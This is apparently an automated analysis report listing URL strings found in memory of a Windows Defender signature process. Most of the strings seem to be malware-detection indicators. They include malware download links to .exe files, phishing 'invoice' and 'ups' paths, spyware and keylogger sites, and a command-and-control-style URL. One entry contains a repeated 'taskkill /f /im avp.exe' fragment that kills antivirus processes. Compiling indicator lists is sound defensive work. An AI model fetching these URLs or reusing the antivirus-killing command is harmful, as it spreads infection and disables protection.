Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.jesuser.cn/plug/doSelect.asp?CMD=%s
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.joyo.com/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.jplineage.com/firo/mail.asp?tomail=163
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline
Source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp	String found in binary or memory: http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlinexl
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.jsonrpc.org/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.judios.org/paid-invoice-credit-card-receipt/
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.jword.jp/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.kaolabao.net/bo/update.ini
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.kerstingutleder.at//p.o/next.php
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://www.key-logger.ws
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://www.klikspaandelft.nl/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.komikeglence.com/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.kreher.tv/dhes/images/images/
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.kryogenix.org/code/browser/sorttable/
Source: MpSigStub.exe, 00000026.00000003.18344712542.00000138BD9CA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kssoftware.ch
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.kuku530.com/?Favorites
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.labsus.org/images/web/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.lindenmontessori.com/cgi-bin/hr_9x/
Source: MpSigStub.exe, 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp	String found in binary or memory: http://www.linkinc.es/scss/water.php
Source: MpSigStub.exe, 00000026.00000003.18356361607.00000138BDCE3000.00000004.00000001.sdmp	String found in binary or memory: http://www.lis.eu
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.livecare.net/x
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.lk2006.com/q15/index.htm
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.lollipop-network.com/privacy.php?lg=
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.look2me.com/
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/
Source: MpSigStub.exe, 00000026.00000003.18290876432.00000138BE187000.00000004.00000001.sdmp	String found in binary or memory: http://www.lop.com/search/xa
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.lumina.it/wp-content/plugins/all-in-one-wp-migration/storage/client/invoice-978561/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.lwstats.com/11/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.lycos.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.macadwarecleaner.com
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://www.macromedia.com/go/getflashplayer
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://www.mail-kunren.jp/sample2018jb1e/index.html?src=
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.malcoimages.com/bk/22/view.php
Source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp	String found in binary or memory: http://www.maliciousurl-695dba18-2bb9-429a-a9a6-fe89a0eb945e.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.manyakpc.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mapquest.com
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://www.mathrandomfloor/photo.txt?buttonnumdiskmlkjihgfed:
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.maxwebsearch.com/s?i_
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://www.mcafee.com93.73.148.17eset.com93.73.148.17
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mcmoney2012.com/fxf09.php
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediabusnetwork.com/phandler.php?pid=
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://www.mediafire.com/download/
Source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp	String found in binary or memory: http://www.megafileupload.com/
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.megasesso.ittaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.exetaskkill/f/imavp.
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.mickyfastdl.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp	String found in binary or memory: http://www.microname.co.kr
Source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mindcrash.it/upload/galleriafotografica
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.mlb.com
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.mmviewer.com/post/
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://www.moliv.com.br/stat/email0702/
Source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp	String found in binary or memory: http://www.monitoreatufamilia.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.monster.com
Source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp	String found in binary or memory: http://www.mootolola.com/
Source: MpSigStub.exe, 00000026.00000003.18303554710.00000138BE851000.00000004.00000001.sdmp	String found in binary or memory: http://www.more4apps.com/
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.info/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://www.mp3codec.net
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.msn.com/?pc=MSERT1
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.mt-download.com/mtrslib2.js
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.mva.by/tags/ariscanin1.e
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://www.mvps.org/vb
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.my123.com/
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.my_wallpaper_location.com/wallpaper.bmp
Source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp	String found in binary or memory: http://www.myarmory.com/search/?Keywords=
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://www.mybrowserbar.com/cgi/coupons.cgi/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.mydreamworld.50webs.com
Source: MpSigStub.exe, 00000026.00000003.18322662955.00000138BD62C000.00000004.00000001.sdmp	String found in binary or memory: http://www.myfiledistribution.com/mfd.php
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.mypaymate.com/dialerplatform/tmp.htm
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.myyiso.com/internet/
Source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp	String found in binary or memory: http://www.nab.com.au
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.navegaki.com/?bd=sc&oem=cube&uid=maxtorxstm3250310as_6ry4hzd9xxxx6ry4hzd9&version=2.3.0.8
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.navexcel.com/
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://www.navsmart.info/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.nba.com
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netfe.org/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.netscape.com
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.netxboy.com/x
Source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp	String found in binary or memory: http://www.niudoudou.com/web/download/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.norton-kaspersky.com/trf/tools
Source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp	String found in binary or memory: http://www.now.cn/?SCPMCID=
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.ntdlzone.com/download.php?xV
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://www.nubileones.com/members/
Source: MpSigStub.exe, 00000026.00000003.18292462058.00000138BDF8A000.00000004.00000001.sdmp	String found in binary or memory: http://www.nuevaq.fm
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.nytimes.com
Source: MpSigStub.exe, 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.omniboxes.com/?type=sc&ts=1425313275&from=amt&uid=sandiskxsdssdhp256g_132567401149
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.onlinedown.net/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.onmylike.com/?utm_source=
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://www.ooooos.com/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.orkut.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.orkut.com.br/Home.aspx
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://www.oursurfing.com
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://www.papaping.com
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://www.paran-welfare.org/dokumente/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pardislab.com/ups-us/feb-12-18-04-16-13/
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcbooster.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.pclady.com.cn/
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/buynow/?
Source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pcpurifier.com/renewal/?
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.phokhobazan.com/%202%200%201%208-0%207%20-%201%201%202%200%200%207:%202%206:%2099%20819.p
Source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pinnaclemedicaltraining.com/invoice/
Source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.piram.com.br/hosts.txt
Source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp	String found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.plustvarama.com
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.policiajudiciaria.pt/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornhub.com/
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pornpassmanager.com/d
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://www.powernum123.com/download/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.pppp123456.cn/welcome.php?k=
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://www.preyer.it/ups.com/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pricemeter.net/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.pricemeter.net/go/postinstall/?action=install&partner=
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://www.printtracker.net
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://www.proarama.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://www.profwoman.ru/mp3remrenamematrix.servmatrix.exe
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.prostol.com/m.html
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.qihoo.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq5.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://www.qq994455.com/
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.qqhudong.cn/usersetup.asp?action=
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.quovadis.bm0
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://www.qvo6.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://www.rabbitsafe.cn/test.exe
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/srch?set=
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=
Source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp	String found in binary or memory: http://www.redirserver.com/update4.cfm?tid=&cn_id=x
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://www.refog.com
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.related.deals
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://www.report-download.com/advplatform/CnetInstaller.exe?appid=x
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://www.rico09.net/nighteyes/96/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.ritmicamente.it/scan/
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://www.rits.ga/excel/view.php
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.rootkit.net.cn
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.rsdn.ru/cgi-bin/search.exe?query=x
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.rtuhrt.pw/a/wmydybda.exe
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.sacbarao.kinghost.net/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.safesear.ch/?type=201
Source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sagawa-exp.co.jp/
Source: MpSigStub.exe, 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp	String found in binary or memory: http://www.satsokal.com/word.doc
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.sbcku.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.scan-dinavia-succession.com/kyqx7t6c/index.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.scanztech.com/wp-content/themes/twentytwelve/inc/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18322318413.00000138BD5A8000.00000004.00000001.sdmp	String found in binary or memory: http://www.se-beach-karting.at/overdue-payment/
Source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-aid.com/search.php?qq=
Source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.search-and-find.netg
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://www.search.ask.com
Source: MpSigStub.exe, 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchmaid.com/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://www.searchult.com/?bd=sc&oem=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://www.seatoskycomputerguy.com/zw/oz/serozv.exe
Source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp	String found in binary or memory: http://www.sectorappliance.com/qdewfww/kdjase.exe
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://www.shadowmp3.com
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.shiyongsousuo.com
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.simplyinstaller.com/HtmlTemplates/finishPage.htmlx
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://www.sitem.biz/
Source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp	String found in binary or memory: http://www.sjhomme.co.kr/images/admin.jpg
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://www.skkyc2004.cn
Source: MpSigStub.exe, 00000026.00000003.18322967354.00000138BCA81000.00000004.00000001.sdmp	String found in binary or memory: http://www.slotch.com/ist/softwares/v4.0/istdownload.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://www.smartpcfixer.com//
Source: MpSigStub.exe, 00000026.00000003.18305972562.00000138BCED3000.00000004.00000001.sdmp	String found in binary or memory: http://www.sniperspy.com/guide.html
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?query=%s
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sogou.com/web?sogouhome=&shuru=shou&query=
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.solsub.com/jasso/hh/imagenes.html?
Source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp	String found in binary or memory: http://www.somegreatsongs.com/promo/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.soporteczamora.com/ups-ship-notification/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://www.soso.com/q?w=%s
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://www.soso.com/q?w=%s&lr=&sc=web&ch=w.p&filter=1&num=10&pg=%d
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sotrag.eu/invoice
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.com
Source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp	String found in binary or memory: http://www.speeditupfree.comxA
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.sportscn.com/
Source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp	String found in binary or memory: http://www.spyburner.com/activate.php?time=
Source: MpSigStub.exe, 00000026.00000003.18349576485.00000138BE313000.00000004.00000001.sdmp	String found in binary or memory: http://www.spylocked.com/?
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://www.sqwire.com
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://www.ssl-256mail.host/5c596a68b83a886b57ade24c?jgiasyi=&pwnmiz_g=1eo3fjfkkke&jgiasyi=wtnygzsiy
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://www.staging.pashminadevelopers.com/wp-admin/g_j/
Source: MpSigStub.exe, 00000026.00000003.18332517389.00000138BD29C000.00000004.00000001.sdmp	String found in binary or memory: http://www.start-space.com/
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.steelbendersrfq.cf/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://www.stimteam.co.za/images
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://www.stockstar.com/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://www.superpctools.com
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://www.support.me/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp, MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://www.supremocontrol.com/a
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://www.surprisingdd.top
Source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp	String found in binary or memory: http://www.sweet-page.com/?type=sc
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://www.sync15.com/bizpolx.exe
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://www.szhaokan.cn/welcome.php?k=
